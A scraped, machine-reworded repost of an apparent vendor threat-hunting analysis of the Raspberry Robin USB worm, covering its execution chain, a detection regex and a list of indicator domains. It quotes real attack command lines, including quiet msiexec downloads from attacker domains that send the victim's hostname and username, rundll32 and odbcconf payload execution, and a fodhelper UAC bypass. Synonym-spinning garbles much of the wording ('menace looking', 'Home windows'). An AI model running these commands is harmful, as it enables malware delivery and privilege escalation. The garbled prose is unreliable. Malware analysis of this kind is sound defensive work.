Tuesday, August 16, 2022
HomeHealthRaspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks

Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks

[ad_1]

Introduction

Throughout our menace looking workout routines in latest months, we’ve began to look at a distinguishing sample of msiexec.exe utilization throughout totally different endpoints. As we drilled all the way down to particular person belongings, we discovered traces of a just lately found malware known as Raspberry Robin. The RedCanary Analysis Group first coined the identify for this malware of their weblog put up, and Sekoia printed a Flash Report concerning the exercise beneath the identify of QNAP Worm. Each articles supply nice evaluation of the malware’s habits. Our findings assist and enrich prior analysis on the subject.

Execution Chain

Raspberry Robin is a worm that spreads over an exterior drive. After preliminary an infection, it downloads its payload via msiexec.exe from QNAP cloud accounts, executes its code via rundll32.exe, and establishes a command and management (C2) channel via TOR connections.

Picture 1: Execution chain of Raspberry Robin

Let’s walkthrough the steps of the kill-chain to see how this malware features.

Supply and Exploitation

Raspberry Robin is delivered via contaminated exterior disks. As soon as connected, cmd.exe tries to execute instructions from a file inside that disk. This file is both a .lnk file or a file with a selected naming sample. Recordsdata with this sample exhibit a 2 to five character identify with an often obscure extension, together with .swy, .chk, .ico, .usb, .xml, and .cfg. Additionally, the attacker makes use of an extreme quantity of whitespace/non printable characters and altering letter case to keep away from string matching detection methods. Instance command strains embrace:

  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /R C:WINDOWSsystem32cmd.exe<Gne.Swy

File pattern for supply may be discovered on this URL:
https://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations

Subsequent, we observe explorer.exe working with an obscure command line argument, spawned by a earlier occasion of cmd.exe. This obscure argument appears to take the identify of an contaminated exterior drive or .lnk file that was beforehand executed. A number of the samples had values together with USB, USB DISK, or USB Drive, whereas another samples had extra particular names. On each occasion of explorer.exe we see that the adversary is altering the letter case to keep away from detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Drive
  • eXplorer USB DISK

Set up

After supply and preliminary execution, cmd.exe spawns msiexec.exe to obtain the Raspberry Robin payload. It makes use of -q or /q along with normal set up parameter to function quietly. As soon as once more, blended case letters are used to bypass detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you’ll be able to see above, URLs used for payload obtain have a selected sample. Domains use 2 to 4 character names with obscure TLDs together with .xyz, .hk, .data, .pw, .cx, .me, and extra. URL paths have a single listing with a random string 11 characters lengthy, adopted by hostname and the username of the sufferer. On community telemetry, we additionally noticed the Home windows Installer consumer agent because of the utilization of msiexec.exe. To detect Raspberry Robin via its URL sample, use this regex:

^http[s]{0,1}://[a-zA-Z0-9]{2,4}.[a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|?).*?$

If we glance up the WHOIS info for given domains, we see area registration dates going way back to February 2015. We additionally see a rise on registered domains ranging from September 2021, which aligns with preliminary observations of Raspberry Robin by our friends.

WHOIS Creation Date Rely
12/9/2015 1
10/8/2020 1
11/14/2020 1
7/3/2021 1
7/26/2021 2
9/11/2021 2
9/23/2021 9
9/24/2021 6
9/26/2021 4
9/27/2021 2
11/9/2021 3
11/10/2021 1
11/18/2021 2
11/21/2021 3
12/11/2021 7
12/31/2021 7
1/17/2022 6
1/30/2022 11
1/31/2022 3
4/17/2022 5

Desk 1: Distribution of area creation dates over time

 

Related domains have SSL certificates with the topic various identify of q74243532.myqnapcloud.com, which factors out the underlying QNAP cloud infra. Additionally, their URL scan outcomes return login pages to QTS service of QNAP:

Picture 2: QNAP QTS login web page from related domains

As soon as the payload is downloaded, it’s executed via numerous system binaries. First, rundll32.exe makes use of the ShellExec_RunDLL operate from shell32.dll to leverage system binaries equivalent to msiexec.exe, odbcconf.exe, or management.exe. These binaries are used to execute the payload saved in C:ProgramData[3 chars]

  • C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a {regsvr C:ProgramDataTvbzhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -E /c /C -a {regsvr C:ProgramDataEuoikdvnbb.xml.}
  • C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg.

It’s adopted by the execution of fodhelper.exe, which has the auto elevated bit set to true. It’s usually leveraged by adversaries as a way to bypass Consumer Account Management and execute extra instructions with escalated privileges [3]. To watch suspicious executions of fodhelper.exe, we recommend monitoring its situations with none command line arguments.

Command and Management

Raspberry Robin units up its C2 channel via the extra execution of system binaries with none command line argument, which is sort of uncommon. That possible factors to course of injection given elevated privileges in earlier steps of execution. It makes use of dllhost.exe, rundll32.exe, and regsvr32.exe to arrange a TOR connection.

Detection via International Menace Alerts

In Cisco International Menace Alerts out there via Cisco Safe Community Analytics and Cisco Safe Endpoint, we monitor this exercise beneath the Raspberry Robin menace object. Picture 3 exhibits a detection pattern of Raspberry Robin:

Picture 3: Raspberry Robin detection pattern in Cisco International Menace Alerts

Conclusion

Raspberry Robin tries to stay undetected via its use of system binaries, blended letter case, TOR-based C2, and abuse of compromised QNAP accounts. Though we’ve got related intelligence gaps (the way it infects exterior disks, what are its actions on goal) like our friends, we’re repeatedly observing its actions.

Indicators of Compromise

Sort Stage IOC
Area Payload Supply k6j[.]pw
Area Payload Supply kjaj[.]high
Area Payload Supply v0[.]cx
Area Payload Supply zk4[.]me
Area Payload Supply zk5[.]co
Area Payload Supply 0dz[.]me
Area Payload Supply 0e[.]si
Area Payload Supply 5qw[.]pw
Area Payload Supply 6w[.]re
Area Payload Supply 6xj[.]xyz
Area Payload Supply aij[.]hk
Area Payload Supply b9[.]pm
Area Payload Supply glnj[.]nl
Area Payload Supply j4r[.]xyz
Area Payload Supply j68[.]data
Area Payload Supply j8[.]si
Area Payload Supply jjl[.]one
Area Payload Supply jzm[.]pw
Area Payload Supply k6c[.]org
Area Payload Supply kj1[.]xyz
Area Payload Supply kr4[.]xyz
Area Payload Supply l9b[.]org
Area Payload Supply lwip[.]re
Area Payload Supply mzjc[.]is
Area Payload Supply nt3[.]xyz
Area Payload Supply qmpo[.]artwork
Area Payload Supply tiua[.]uk
Area Payload Supply vn6[.]co
Area Payload Supply z7s[.]org
Area Payload Supply k5x[.]xyz
Area Payload Supply 6Y[.]rE
Area Payload Supply doem[.]Re
Area Payload Supply bpyo[.]IN
Area Payload Supply l5k[.]xYZ
Area Payload Supply uQW[.]fUTbOL
Area Payload Supply t7[.]Nz
Area Payload Supply 0t[.]yT

References

  1. Raspberry Robin will get the worm early – https://redcanary.com/weblog/raspberry-robin/
  2. QNAP worm: who advantages from crime? – https://7095517.fs1.hubspotusercontent-na1.web/hubfs/7095517/FLINTpercent202022-016percent20-%20QNAPpercent20worm_percent20whopercent20benefitspercent20frompercent20crimepercent20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.weblog/2017/06/07/uac-bypass-fodhelper/

Share:

[ad_2]

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular

Recent Comments